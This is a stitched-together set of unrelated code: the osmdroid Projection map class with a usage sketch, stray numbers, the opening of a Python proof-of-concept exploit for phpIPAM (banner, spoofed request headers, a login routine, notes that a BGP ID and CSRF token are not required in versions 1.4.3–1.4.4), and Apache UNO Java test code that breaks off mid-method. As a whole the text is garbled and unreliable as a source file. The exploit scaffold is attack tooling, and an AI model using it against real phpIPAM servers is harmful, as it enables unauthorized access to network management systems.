mapView.getMapCenterOffsetX(), mapView.getMapCenterOffsetY()); } /** * @since 6.0.0 */ public Projection( final double pZoomLevel, final Rect pScreenRect, final GeoPoint pCenter, final long pScrollX, final long pScrollY, final float pOrientation, final boolean pHorizontalWrapEnabled, final boolean pVerticalWrapEnabled, final TileSystem pTileSystem, final int pMapCenterOffsetX, final int pMapCenterOffsetY) { mMapCenterOffsetX = pMapCenterOffsetX; mMapCenterOffsetY = pMapCenterOffsetY; mZoomLevelProjection = pZoomLevel; horizontalWrapEnabled = pHorizontalWrapEnabled; verticalWrapEnabled = pVerticalWrapEnabled; mTileSystem = pTileSystem; mMercatorMapSize = TileSystem.MapSize(mZoomLevelProjection); mTileSize = TileSystem.getTileSize(mZoomLevelProjection); mIntrinsicScreenRectProjection = pScreenRect; final GeoPoint center = pCenter != null ? 
pCenter : new GeoPoint(0., 0); mScrollX = pScrollX; mScrollY = pScrollY; mOffsetX = getScreenCenterX() - mScrollX - mTileSystem.getMercatorXFromLongitude(center.getLongitude(), mMercatorMapSize, this.horizontalWrapEnabled); mOffsetY = getScreenCenterY() - mScrollY - mTileSystem.getMercatorYFromLatitude(center.getLatitude(), mMercatorMapSize, this.verticalWrapEnabled); mOrientation = pOrientation; mRotateAndScaleMatrix.preRotate(mOrientation, getScreenCenterX(), getScreenCenterY()); mRotateAndScaleMatrix.invert(mUnrotateAndScaleMatrix); refresh(); } /** * @since 6.1.0 */ public Projection( final double pZoomLevel, final int pWidth, final int pHeight, final GeoPoint pCenter, final float pOrientation, final boolean pHorizontalWrapEnabled, final boolean pVerticalWrapEnabled, final int pMapCenterOffsetX, final int pMapCenterOffsetY) { this( pZoomLevel, new Rect(0, 0, pWidth, pHeight), pCenter, 0, 0, pOrientation, pHorizontalWrapEnabled, pVerticalWrapEnabled, MapView.getTileSystem(), pMapCenterOffsetX, pMapCenterOffsetY); } /** * @since 6.0.0 */ public Projection getOffspring(final double pZoomLevel, final Rect pScreenRect) { return new Projection( pZoomLevel, pScreenRect, mCurrentCenter, 0, 0, mOrientation, horizontalWrapEnabled, verticalWrapEnabled, mTileSystem, 0, 0); // 0 looks like the most relevant value } public double getZoomLevel() { return mZoomLevelProjection; } public BoundingBox getBoundingBox() { return mBoundingBoxProjection; } public Rect getScreenRect() { return mScreenRectProjection; } public Rect getIntrinsicScreenRect() { return mIntrinsicScreenRectProjection; } @Override public IGeoPoint fromPixels(int x, int y) { return fromPixels(x, y, null, false); } /** * note: if {@link MapView#setHorizontalMapRepetitionEnabled(boolean)} or * {@link MapView#setVerticalMapRepetitionEnabled(boolean)} is false, then this * can return values that beyond the max extents of the world. This may or may not be * desired. <a href="https://github.com/osmdroid/osmdroid/pull/722">https://github.com/osmdroid/osmdroid/pull/722</a> * for more information and the discussion associated with this. * * @param pPixelX * @param pPixelY * @param pReuse * @return */ public IGeoPoint fromPixels(final int pPixelX, final int pPixelY, final GeoPoint pReuse) { return fromPixels(pPixelX, pPixelY, pReuse, false); } /** * * note: if {@link MapView#setHorizontalMapRepetitionEnabled(boolean)} or * {@link MapView#setVerticalMapRepetitionEnabled(boolean)} is false, then this * can return values that beyond the max extents of the world. This may or may not be * desired. <a href="https://github.com/osmdroid/osmdroid/pull/722">https://github.com/osmdroid/osmdroid/pull/722</a> * for more information and the discussion associated with this. 
* * @param pPixelX * @param pPixelY * @param pReuse * @param forceWrap * @return */ public IGeoPoint fromPixels(final int pPixelX, final int pPixelY, final GeoPoint pReuse, boolean forceWrap) { //reverting https://github.com/osmdroid/osmdroid/issues/459 //due to relapse of https://github.com/osmdroid/osmdroid/issues/507 //reverted functionality is now on the method fromPixelsRotationSensitive return mTileSystem.getGeoFromMercator(getCleanMercator(getMercatorXFromPixel(pPixelX), horizontalWrapEnabled), getCleanMercator(getMercatorYFromPixel(pPixelY), verticalWrapEnabled), mMercatorMapSize, pReuse, horizontalWrapEnabled || forceWrap, verticalWrapEnabled || forceWrap); } @Override public Point toPixels(final IGeoPoint in, final Point reuse) { return toPixels(in, reuse, false); } public Point toPixels(final IGeoPoint in, final Point reuse, boolean forceWrap) { final Point out = reuse != null ? reuse : new Point(); out.x = TileSystem.truncateToInt(getLongPixelXFromLongitude(in.getLongitude(), forceWrap)); out.y = TileSystem.truncateToInt(getLongPixelYFromLatitude(in.getLatitude(), forceWrap)); return out; } /** * @since 6.0.0 * TODO refactor */ public long getLongPixelXFromLongitude(final double pLongitude, boolean forceWrap) { return getLongPixelXFromMercator(mTileSystem.getMercatorXFromLongitude(pLongitude, mMercatorMapSize, horizontalWrapEnabled || forceWrap), horizontalWrapEnabled); } /** * @since 6.0.0 * TODO refactor */ public long getLongPixelXFromLongitude(final double pLongitude) { return getLongPixelXFromMercator(mTileSystem.getMercatorXFromLongitude(pLongitude, mMercatorMapSize, false), false); } /** * @since 6.0.0 * TODO refactor */ public long getLongPixelYFromLatitude(final double pLatitude, boolean forceWrap) { return getLongPixelYFromMercator(mTileSystem.getMercatorYFromLatitude(pLatitude, mMercatorMapSize, verticalWrapEnabled || forceWrap), verticalWrapEnabled); } /** * @since 6.0.0 * TODO refactor */ public long getLongPixelYFromLatitude(final double pLatitude) { return getLongPixelYFromMercator(mTileSystem.getMercatorYFromLatitude(pLatitude, mMercatorMapSize, false), false); } /** * A wrapper for {@link #toProjectedPixels(double, double, PointL)} */ public PointL toProjectedPixels(final GeoPoint geoPoint, final PointL reuse) { return toProjectedPixels(geoPoint.getLatitude(), geoPoint.getLongitude(), reuse); } /** * Performs only the first computationally heavy part of the projection. Call * {@link #getLongPixelsFromProjected(PointL, double, boolean, PointL)} to get the final position. * * @param latituteE6 the latitute of the point * @param longitudeE6 the longitude of the point * @param reuse just pass null if you do not have a PointL to be 'recycled'. * @return intermediate value to be stored and passed to toMapPixelsTranslated. * @deprecated Use {@link #toProjectedPixels(double, double, PointL)} instead */ @Deprecated public PointL toProjectedPixels(final long latituteE6, final long longitudeE6, final PointL reuse) { return toProjectedPixels(latituteE6 * 1E-6, longitudeE6 * 1E-6, reuse); } /** * Performs only the first computationally heavy part of the projection. Call * {@link #getLongPixelsFromProjected(PointL, double, boolean, PointL)} to get the final position. * * @param latitude the latitute of the point * @param longitude the longitude of the point * @param reuse just pass null if you do not have a PointL to be 'recycled'. * @return intermediate value to be stored and passed to toMapPixelsTranslated. 
*/ public PointL toProjectedPixels(final double latitude, final double longitude, final PointL reuse) { return toProjectedPixels(latitude, longitude, true, reuse); } /** * @since 6.0.0 */ public PointL toProjectedPixels(final double latitude, final double longitude, final boolean pWrapEnabled, final PointL reuse) { return mTileSystem.getMercatorFromGeo(latitude, longitude, mProjectedMapSize, reuse, pWrapEnabled); } /** * Performs the second computationally light part of the projection. * * @param in the PointL calculated by the {@link #toProjectedPixels(double, double, PointL)} * @param reuse just pass null if you do not have a Point to be 'recycled'. * @return the Point containing the coordinates of the initial GeoPoint passed to the * {@link #toProjectedPixels(double, double, PointL)}. * @deprecated Use {@link #getLongPixelsFromProjected(PointL, double, boolean, PointL)} instead */ @Deprecated public Point toPixelsFromProjected(final PointL in, final Point reuse) { final Point out = reuse != null ? reuse : new Point(); final double power = getProjectedPowerDifference(); final PointL tmp = new PointL(); getLongPixelsFromProjected(in, power, true, tmp); out.x = TileSystem.truncateToInt(tmp.x); out.y = TileSystem.truncateToInt(tmp.y); return out; } /** * @deprecated Use {@link #getLongPixelsFromProjected(PointL, double, boolean, PointL)} instead */ @Deprecated public Point toPixelsFromMercator(final long pMercatorX, final long pMercatorY, final Point reuse) { final Point out = reuse != null ? reuse : new Point(); out.x = TileSystem.truncateToInt(getLongPixelXFromMercator(pMercatorX, true)); out.y = TileSystem.truncateToInt(getLongPixelYFromMercator(pMercatorY, true)); return out; } public PointL toMercatorPixels(final int pPixelX, final int pPixelY, final PointL reuse) { final PointL out = reuse != null ? reuse : new PointL(); out.x = getCleanMercator(getMercatorXFromPixel(pPixelX), horizontalWrapEnabled); out.y = getCleanMercator(getMercatorYFromPixel(pPixelY), verticalWrapEnabled); return out; } @Override public float metersToEquatorPixels(final float meters) { return metersToPixels(meters, 0, mZoomLevelProjection); } /** * Converts a distance in meters to one in (horizontal) pixels at the current zoomlevel and at * the current latitude at the center of the screen. * * @param meters the distance in meters * @return The number of pixels corresponding to the distance, if measured at the center of the * screen, at the current zoom level. The return value may only be approximate. */ public float metersToPixels(final float meters) { return metersToPixels(meters, getBoundingBox().getCenterWithDateLine().getLatitude(), mZoomLevelProjection); } /** * @since 6.0 */ public float metersToPixels(final float meters, final double latitude, final double zoomLevel) { return (float) (meters / TileSystem.GroundResolution(latitude, zoomLevel)); } @Override public IGeoPoint getNorthEast() { return fromPixels(mIntrinsicScreenRectProjection.right, mIntrinsicScreenRectProjection.top, null, true); } @Override public IGeoPoint getSouthWest() { return fromPixels(mIntrinsicScreenRectProjection.left, mIntrinsicScreenRectProjection.bottom, null, true); } /** * This will provide a Matrix that will revert the current map's scaling and rotation. This can * be useful when drawing to a fixed location on the screen. */ public Matrix getInvertedScaleRotateCanvasMatrix() { return mUnrotateAndScaleMatrix; } /** * This will revert the current map's scaling and rotation for a point. 
This can be useful when * drawing to a fixed location on the screen. */ public Point unrotateAndScalePoint(int x, int y, Point reuse) { return applyMatrixToPoint(x, y, reuse, mUnrotateAndScaleMatrix, mOrientation != 0); } /** * This will apply the current map's scaling and rotation for a point. This can be useful when * converting MotionEvents to a screen point. */ public Point rotateAndScalePoint(int x, int y, Point reuse) { return applyMatrixToPoint(x, y, reuse, mRotateAndScaleMatrix, mOrientation != 0); } /** * @since 6.0.0 */ private Point applyMatrixToPoint(final int pX, final int pY, final Point reuse, final Matrix pMatrix, final boolean pCondition) { final Point out = reuse != null ? reuse : new Point(); if (pCondition) { mRotateScalePoints[0] = pX; mRotateScalePoints[1] = pY; pMatrix.mapPoints(mRotateScalePoints); out.x = (int) mRotateScalePoints[0]; out.y = (int) mRotateScalePoints[1]; } else { out.x = pX; out.y = pY; } return out; } /** * @since 5.6 */ public void detach() { } /** * @since 6.0.0 */ public Rect getPixelFromTile(final int pTileX, final int pTileY, final Rect pReuse) { final Rect out = pReuse != null ? pReuse : new Rect(); out.left = TileSystem.truncateToInt(getLongPixelXFromMercator(getMercatorFromTile(pTileX), false)); out.top = TileSystem.truncateToInt(getLongPixelYFromMercator(getMercatorFromTile(pTileY), false)); out.right = TileSystem.truncateToInt(getLongPixelXFromMercator(getMercatorFromTile(pTileX + 1), false)); out.bottom = TileSystem.truncateToInt(getLongPixelYFromMercator(getMercatorFromTile(pTileY + 1), false)); return out; } /** * @since 6.0.0 */ public long getMercatorFromTile(final int pTile) { return TileSystem.getMercatorFromTile(pTile, mTileSize); } /** * This will provide a Matrix that will revert the current map's scaling and rotation. This can * be useful when drawing to a fixed location on the screen. */ public Matrix getScaleRotateCanvasMatrix() { return mRotateAndScaleMatrix; } /** * @since 6.0.0 */ public double getProjectedPowerDifference() { return mProjectedMapSize / getWorldMapSize(); } /** * @since 6.0.0 * @deprecated Use {@link #getLongPixelsFromProjected(PointL, double, boolean, PointL)} instead */ @Deprecated public Point getPixelsFromProjected(final PointL in, final double powerDifference, final Point reuse) { final Point out = reuse != null ? reuse : new Point(); final PointL tmp = new PointL(); getLongPixelsFromProjected(in, powerDifference, true, tmp); out.x = TileSystem.truncateToInt(tmp.x); out.y = TileSystem.truncateToInt(tmp.y); return out; } /** * @param in Input point: a geo point projected to the map with the largest zoom level (aka "projected" map) * @param powerDifference Factor between the large "projected" map and the wanted projection zoom level * @param pCloser "Should we move the resulting point - modulo the map size - so that it's * as close to the screen limits as possible?" * @since 6.0.0 */ public PointL getLongPixelsFromProjected(final PointL in, final double powerDifference, final boolean pCloser, final PointL reuse) { final PointL out = reuse != null ? reuse : new PointL(); out.x = getLongPixelXFromMercator((long) (in.x / powerDifference), pCloser); out.y = getLongPixelYFromMercator((long) (in.y / powerDifference), pCloser); return out; } /** * @since 6.0.0 * Correction of pixel value. * Pixel values are identical, modulo mapSize. 
* What we explicitly want is either: * * the visible pixel that is the closest to the left (first choice) * * the invisible pixel that is the closest to the screen center */ private long getCloserPixel(long pPixel, final int pScreenLimitFirst, final int pScreenLimitLast, final double pMapSize) { final long center = (pScreenLimitFirst + pScreenLimitLast) / 2; long previous = 0; if (pPixel < pScreenLimitFirst) { while (pPixel < pScreenLimitFirst) { previous = pPixel; pPixel += pMapSize; } if (pPixel < pScreenLimitLast) { return pPixel; } if (Math.abs(center - pPixel) < Math.abs(center - previous)) { return pPixel; } return previous; } while (pPixel >= pScreenLimitFirst) { previous = pPixel; pPixel -= pMapSize; } if (previous < pScreenLimitLast) { return previous; } if (Math.abs(center - pPixel) < Math.abs(center - previous)) { return pPixel; } return previous; } /** * @since 6.0.0 */ private long getLongPixelXFromMercator(final long pMercatorX, final boolean pCloser) { return getLongPixelFromMercator(pMercatorX, pCloser, mOffsetX, mIntrinsicScreenRectProjection.left, mIntrinsicScreenRectProjection.right); } /** * @since 6.0.0 */ private long getLongPixelYFromMercator(final long pMercatorY, final boolean pCloser) { return getLongPixelFromMercator(pMercatorY, pCloser, mOffsetY, mIntrinsicScreenRectProjection.top, mIntrinsicScreenRectProjection.bottom); } /** * @since 6.0.0 */ private long getLongPixelFromMercator(final long pMercator, final boolean pCloser, final long pOffset, final int pScreenLimitFirst, final int pScreenLimitLast) { long result = pMercator + pOffset; if (pCloser) { result = getCloserPixel(result, pScreenLimitFirst, pScreenLimitLast, mMercatorMapSize); } return result; } /** * @since 6.0.0 */ public int getTileFromMercator(final long pMercator) { return TileSystem.getTileFromMercator(pMercator, mTileSize); } /** * @since 6.0.0 */ public RectL getMercatorViewPort(final RectL pReuse) { final RectL out = pReuse != null ? 
pReuse : new RectL(); // in the standard case, that's all we need: the screen rect corners float left = mIntrinsicScreenRectProjection.left; float right = mIntrinsicScreenRectProjection.right; float top = mIntrinsicScreenRectProjection.top; float bottom = mIntrinsicScreenRectProjection.bottom; // sometimes we need to expand beyond in order to get all visible tiles if (mOrientation != 0) { final float scaleRotatePoints[] = new float[8]; scaleRotatePoints[0] = mIntrinsicScreenRectProjection.left; scaleRotatePoints[1] = mIntrinsicScreenRectProjection.top; scaleRotatePoints[2] = mIntrinsicScreenRectProjection.right; scaleRotatePoints[3] = mIntrinsicScreenRectProjection.bottom; scaleRotatePoints[4] = mIntrinsicScreenRectProjection.left; scaleRotatePoints[5] = mIntrinsicScreenRectProjection.bottom; scaleRotatePoints[6] = mIntrinsicScreenRectProjection.right; scaleRotatePoints[7] = mIntrinsicScreenRectProjection.top; mUnrotateAndScaleMatrix.mapPoints(scaleRotatePoints); for (int i = 0; i < 8; i += 2) { if (left > scaleRotatePoints[i]) { left = scaleRotatePoints[i]; } if (right < scaleRotatePoints[i]) { right = scaleRotatePoints[i]; } if (top > scaleRotatePoints[i + 1]) { top = scaleRotatePoints[i + 1]; } if (bottom < scaleRotatePoints[i + 1]) { bottom = scaleRotatePoints[i + 1]; } } } out.left = getMercatorXFromPixel((int) left); out.top = getMercatorYFromPixel((int) top); out.right = getMercatorXFromPixel((int) right); out.bottom = getMercatorYFromPixel((int) bottom); return out; } /** * @since 6.0.0 */ public int getScreenCenterX() { return (mIntrinsicScreenRectProjection.right + mIntrinsicScreenRectProjection.left) / 2 + mMapCenterOffsetX; } /** * @since 6.0.0 */ public int getScreenCenterY() { return (mIntrinsicScreenRectProjection.bottom + mIntrinsicScreenRectProjection.top) / 2 + mMapCenterOffsetY; } /** * @since 6.0.0 */ public long getMercatorXFromPixel(final int pPixelX) { return pPixelX - mOffsetX; } /** * @since 6.0.0 */ public long getMercatorYFromPixel(final int pPixelY) { return pPixelY - mOffsetY; } /** * @since 6.0.0 */ public long getCleanMercator(final long pMercator, final boolean wrapEnabled) { return mTileSystem.getCleanMercator(pMercator, mMercatorMapSize, wrapEnabled); } /** * @since 6.0.0 */ public GeoPoint getCurrentCenter() { return mCurrentCenter; } public long getOffsetX() { return mOffsetX; } public long getOffsetY() { return mOffsetY; } /** * @since 6.0.0 */ public void save(final Canvas pCanvas, final boolean pMapRotation, final boolean pForce) { if (mOrientation != 0 || pForce) { pCanvas.save(); pCanvas.concat(pMapRotation ? mRotateAndScaleMatrix : mUnrotateAndScaleMatrix); } } /** * @since 6.0.0 */ public void restore(final Canvas pCanvas, final boolean pForce) { if (mOrientation != 0 || pForce) { pCanvas.restore(); } } /** * @since 6.0.0 */ private void refresh() { // of course we could write mIntrinsicScreenRectProjection.centerX() and centerY() // but we should keep writing it that way (cf. ProjectionTest) fromPixels(getScreenCenterX(), getScreenCenterY(), mCurrentCenter); if (mOrientation != 0 && mOrientation != 180) { GeometryMath.getBoundingBoxForRotatatedRectangle( mIntrinsicScreenRectProjection, getScreenCenterX(), getScreenCenterY(), mOrientation, mScreenRectProjection); } else { // of course we could write mScreenRectProjection.set(mIntrinsicScreenRectProjection); // but we should keep writing it that way (cf. 
ProjectionTest) mScreenRectProjection.left = mIntrinsicScreenRectProjection.left; mScreenRectProjection.top = mIntrinsicScreenRectProjection.top; mScreenRectProjection.right = mIntrinsicScreenRectProjection.right; mScreenRectProjection.bottom = mIntrinsicScreenRectProjection.bottom; } IGeoPoint neGeoPoint = fromPixels( mScreenRectProjection.right, mScreenRectProjection.top, null, true); final TileSystem tileSystem = org.osmdroid.views.MapView.getTileSystem(); if (neGeoPoint.getLatitude() > tileSystem.getMaxLatitude()) { neGeoPoint = new GeoPoint(tileSystem.getMaxLatitude(), neGeoPoint.getLongitude()); } if (neGeoPoint.getLatitude() < tileSystem.getMinLatitude()) { neGeoPoint = new GeoPoint(tileSystem.getMinLatitude(), neGeoPoint.getLongitude()); } IGeoPoint swGeoPoint = fromPixels( mScreenRectProjection.left, mScreenRectProjection.bottom, null, true); if (swGeoPoint.getLatitude() > tileSystem.getMaxLatitude()) { swGeoPoint = new GeoPoint(tileSystem.getMaxLatitude(), swGeoPoint.getLongitude()); } if (swGeoPoint.getLatitude() < tileSystem.getMinLatitude()) { swGeoPoint = new GeoPoint(tileSystem.getMinLatitude(), swGeoPoint.getLongitude()); } mBoundingBoxProjection.set( neGeoPoint.getLatitude(), neGeoPoint.getLongitude(), swGeoPoint.getLatitude(), swGeoPoint.getLongitude()); } /** * Adjust the offsets so that this geo point projects into that pixel * * @since 6.0.0 */ public void adjustOffsets(final IGeoPoint pGeoPoint, final PointF pPixel) { if (pPixel == null) { return; } if (pGeoPoint == null) { return; } final Point unRotatedExpectedPixel = unrotateAndScalePoint((int) pPixel.x, (int) pPixel.y, null); final Point unRotatedActualPixel = toPixels(pGeoPoint, null); final long deltaX = unRotatedExpectedPixel.x - unRotatedActualPixel.x; final long deltaY = unRotatedExpectedPixel.y - unRotatedActualPixel.y; adjustOffsets(deltaX, deltaY); } /** * Adjust the offsets so that * either this bounding box is bigger than the screen and contains it * or it is smaller and it is centered * * @since 6.0.0 * @deprecated Use {@link #adjustOffsets(double, double, boolean, int)} instead */ @Deprecated public void adjustOffsets(final BoundingBox pBoundingBox) { if (pBoundingBox == null) { return; } adjustOffsets(pBoundingBox.getLonWest(), pBoundingBox.getLonEast(), false, 0); adjustOffsets(pBoundingBox.getActualNorth(), pBoundingBox.getActualSouth(), true, 0); } /** * Adjust offsets so that north and south (if latitude, west and east if longitude) * actually "fit" into the screen, with a tolerance of extraSize pixels. * Used in order to ensure scroll limits. 
* * @since 6.0.0 */ void adjustOffsets(final double pNorthOrWest, final double pSouthOrEast, final boolean isLatitude, final int pExtraSize) { final long min; final long max; final long deltaX; final long deltaY; if (isLatitude) { min = getLongPixelYFromLatitude(pNorthOrWest); max = getLongPixelYFromLatitude(pSouthOrEast); deltaX = 0; deltaY = getScrollableOffset(min, max, mMercatorMapSize, mIntrinsicScreenRectProjection.height(), pExtraSize); } else { min = getLongPixelXFromLongitude(pNorthOrWest); max = getLongPixelXFromLongitude(pSouthOrEast); deltaX = getScrollableOffset(min, max, mMercatorMapSize, mIntrinsicScreenRectProjection.width(), pExtraSize); deltaY = 0; } adjustOffsets(deltaX, deltaY); } /** * @since 6.0.0 */ void adjustOffsets(final long pDeltaX, final long pDeltaY) { if (pDeltaX == 0 && pDeltaY == 0) { return; } mOffsetX += pDeltaX; mOffsetY += pDeltaY; mScrollX -= pDeltaX; mScrollY -= pDeltaY; refresh(); } /** * @param pPixelMin Pixel position of the limit (left) * @param pPixelMax Pixel position of the limit (right) * @param pWorldSize World map size - for modulo adjustments * @param pScreenSize Screen size * @param pExtraSize Extra size to consider at each side of the screen * @return the offset to apply so that the limits are within the screen * @since 6.0.0 */ public static long getScrollableOffset(final long pPixelMin, long pPixelMax, final double pWorldSize, final int pScreenSize, final int pExtraSize) { while (pPixelMax - pPixelMin < 0) { // date line + several worlds fix pPixelMax += pWorldSize; } long delta; if (pPixelMax - pPixelMin < pScreenSize - 2 * pExtraSize) { final long half = (pPixelMax - pPixelMin) / 2; if ((delta = pScreenSize / 2 - half - pPixelMin) > 0) { return delta; } if ((delta = pScreenSize / 2 + half - pPixelMax) < 0) { return delta; } return 0; } if ((delta = pExtraSize - pPixelMin) < 0) { return delta; } if ((delta = pScreenSize - pExtraSize - pPixelMax) > 0) { return delta; } return 0; } /** * @since 6.0.0 */ boolean setMapScroll(final MapView pMapView) { if (pMapView.getMapScrollX() == mScrollX && pMapView.getMapScrollY() == mScrollY) { return false; } pMapView.setMapScroll(mScrollX, mScrollY); return true; } /** * @since 6.1.0 */ public boolean isHorizontalWrapEnabled() { return horizontalWrapEnabled; } /** * @since 6.1.0 */ public boolean isVerticalWrapEnabled() { return verticalWrapEnabled; } /** * @since 6.1.0 */ public float getOrientation() { return mOrientation; } /** * @since 6.1.0 */ public int getWidth() { return mIntrinsicScreenRectProjection.width(); } /** * @since 6.1.0 */ public int getHeight() { return mIntrinsicScreenRectProjection.height(); } /** * @since 6.2.0 */ public double getWorldMapSize() { return mMercatorMapSize; } }
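/*
 * Editor's note: a short forward/inverse usage sketch for the Projection class above,
 * for illustration only. The zoom level, screen size and coordinates are arbitrary
 * sample values, and the sketch assumes it runs where the android.graphics classes are
 * available; it exercises only the public Projection constructor, toPixels and fromPixels.
 */
package org.osmdroid.views;

import android.graphics.Point;

import org.osmdroid.api.IGeoPoint;
import org.osmdroid.util.GeoPoint;

final class ProjectionUsageSketch {

    static void demo() {
        // A 1080x1920 px viewport centered on (52.5200, 13.4050) at zoom 12, no rotation,
        // with horizontal and vertical map repetition enabled and no center offset.
        Projection projection = new Projection(
                12.0, 1080, 1920,
                new GeoPoint(52.5200, 13.4050),
                0f, true, true, 0, 0);

        // Geo coordinates -> screen pixels ...
        Point pixel = projection.toPixels(new GeoPoint(52.5200, 13.4050), null);

        // ... and screen pixels -> geo coordinates again (approximately the original point).
        IGeoPoint roundTrip = projection.fromPixels(pixel.x, pixel.y);
        System.out.println(pixel.x + "," + pixel.y + " -> "
                + roundTrip.getLatitude() + "," + roundTrip.getLongitude());
    }
}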
13,431
421
import sys import urllib3 urllib3.disable_warnings() def banner(): print(""" ___ _ _ ____ ___ ___ ___ ___ ___ ___ ___ __ _ / __)( \/ )( ___)___(__ \ / _ \(__ \ (__ \ ___(__ \ (__ ) / _ \ /. | / ) ( (__ \ / )__)(___)/ _/( (_) )/ _/ / _/(___)/ _/ (_ \( (_) )(_ _)/ _ \\ \___) \/ (____) (____)\___/(____)(____) (____)(___/ \___/ (_) \___/ """) print(" Vulnerability discovered by <NAME>") print(" PoC author: @javicarabantes") def generate_headers(csrftoken, phpipam_session): return { "Host": "localhost:8888", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Content-Length": "214", "Origin": "http://localhost:8888", "Connection": "close", "Referer": "http://localhost:8888/index.php?page=tools&section=routing&subnetId=bgp&sPage=1", "Cookie": f"csrftoken={csrftoken}; dojo-sidebar=max; phpipam={phpipam_session}; table-page-size=50", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin" } def get_bgp_id(): # Does not seem to be a requirement in phpipam 1.4.3 and 1.4.4 return 1 def login(session, login_url, ipamusername, ipampassword, csrftoken): headers = generate_headers(None, None) # We don't need the cookie for login headers.pop("Cookie") payload = { "ipamusername": ipamusername, "ipampassword": <PASSWORD> } response = session.post(login_url, data=payload, headers=headers, verify=False) if response.status_code == 200: if "Invalid username" in response.text: print("Bad credentials") sys.exit(1) if len(session.cookies.get_dict()) > 0 and "phpipam" in session.cookies.get_dict(): return session.cookies.get_dict()['phpipam'] else: print("no phpipam session returned") sys.exit(1) else: print(f"Status code was {response.status_code}. Check the URL") sys.exit(1) def fetch_csrf_token(): # Does not seem to be a requirement in phpipam 1.4.3 and 1.4.4 return None
1,184
679
<gh_stars>100-1000 /************************************************************** * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. * *************************************************************/ package test.cppuhelper.propertysetmixin.comp; import com.sun.star.beans.Ambiguous; import com.sun.star.beans.Defaulted; import com.sun.star.beans.Optional; import com.sun.star.beans.UnknownPropertyException; import com.sun.star.beans.PropertyValue; import com.sun.star.beans.PropertyVetoException; import com.sun.star.beans.XFastPropertySet; import com.sun.star.beans.XPropertyAccess; import com.sun.star.beans.XPropertyChangeListener; import com.sun.star.beans.XPropertySet; import com.sun.star.beans.XPropertySetInfo; import com.sun.star.beans.XVetoableChangeListener; import com.sun.star.comp.loader.FactoryHelper; import com.sun.star.lang.WrappedTargetException; import com.sun.star.lang.XComponent; import com.sun.star.lang.XEventListener; import com.sun.star.lang.XMultiServiceFactory; import com.sun.star.lang.XSingleServiceFactory; import com.sun.star.lib.uno.helper.WeakBase; import com.sun.star.lib.uno.helper.PropertySetMixin; import com.sun.star.registry.XRegistryKey; import com.sun.star.uno.Any; import com.sun.star.uno.IQueryInterface; import com.sun.star.uno.Type; import com.sun.star.uno.XComponentContext; import test.cppuhelper.propertysetmixin.XSupplier; import test.cppuhelper.propertysetmixin.XTest3; public final class JavaSupplier extends WeakBase implements XSupplier { public JavaSupplier(XComponentContext context) { this.context = context; } public XComponent getEmpty1() { return new Empty1(); } public XComponent getEmpty2() { return new Empty2(); } public XTest3 getFull() { return new Full(); } public static XSingleServiceFactory __getServiceFactory( String implName, XMultiServiceFactory multiFactory, XRegistryKey regKey) { return implName.equals(implementationName) ? 
FactoryHelper.getServiceFactory( JavaSupplier.class, serviceName, multiFactory, regKey) : null; } private static final String implementationName = JavaSupplier.class.getName(); private static final String serviceName = "test.cppuhelper.propertysetmixin.JavaSupplier"; private final class Empty1 extends WeakBase implements XComponent { public Empty1() {} public void dispose() { prop.dispose(); } public void addEventListener(XEventListener listener) {} public void removeEventListener(XEventListener listener) {} private final PropertySetMixin prop = new PropertySetMixin( context, this, new Type(XComponent.class), null); } private final class Empty2 extends WeakBase implements XComponent, XPropertySet, XFastPropertySet, XPropertyAccess { public Empty2() {} public void dispose() { prop.dispose(); } public void addEventListener(XEventListener listener) {} public void removeEventListener(XEventListener listener) {} public com.sun.star.beans.XPropertySetInfo getPropertySetInfo() { return prop.getPropertySetInfo(); } public void setPropertyValue(String propertyName, Object value) throws UnknownPropertyException, PropertyVetoException, com.sun.star.lang.IllegalArgumentException, WrappedTargetException { prop.setPropertyValue(propertyName, value); } public Object getPropertyValue(String propertyName) throws UnknownPropertyException, WrappedTargetException { return prop.getPropertyValue(propertyName); } public void addPropertyChangeListener( String propertyName, XPropertyChangeListener listener) throws UnknownPropertyException, WrappedTargetException { prop.addPropertyChangeListener(propertyName, listener); } public void removePropertyChangeListener( String propertyName, XPropertyChangeListener listener) throws UnknownPropertyException, WrappedTargetException { prop.removePropertyChangeListener(propertyName, listener); } public void addVetoableChangeListener( String propertyName, XVetoableChangeListener listener) throws UnknownPropertyException, WrappedTargetException { prop.addVetoableChangeListener(propertyName, listener); } public void removeVetoableChangeListener( String propertyName, XVetoableChangeListener listener) throws UnknownPropertyException, WrappedTargetException { prop.removeVetoableChangeListener(propertyName, listener); } public void setFastPropertyValue(int handle, Object value) throws UnknownPropertyException, PropertyVetoException, com.sun.star.lang.IllegalArgumentException, WrappedTargetException { prop.setFastPropertyValue(handle, value); } public Object getFastPropertyValue(int handle) throws UnknownPropertyException, WrappedTargetException { return prop.getFastPropertyValue(handle); } public PropertyValue[] getPropertyValues() { return prop.getPropertyValues(); } public void setPropertyValues(PropertyValue[] props) throws UnknownPropertyException, PropertyVetoException, com.sun.star.lang.IllegalArgumentException, WrappedTargetException { prop.setPropertyValues(props); } private final PropertySetMixin prop = new PropertySetMixin( context, this, new Type(XComponent.class), null); } private final class Full extends WeakBase implements XTest3, XPropertySet, XFastPropertySet, XPropertyAccess { public Full() {} public synchronized int getFirst() { return a1; } public void setFirst(int value) { prop.prepareSet("First", null); synchronized (this) { a1 = value; } } public synchronized Ambiguous getSecond() throws UnknownPropertyException { return a2; } public void setSecond(Ambiguous value) throws PropertyVetoException, UnknownPropertyException { PropertySetMixin.BoundListeners l = new 
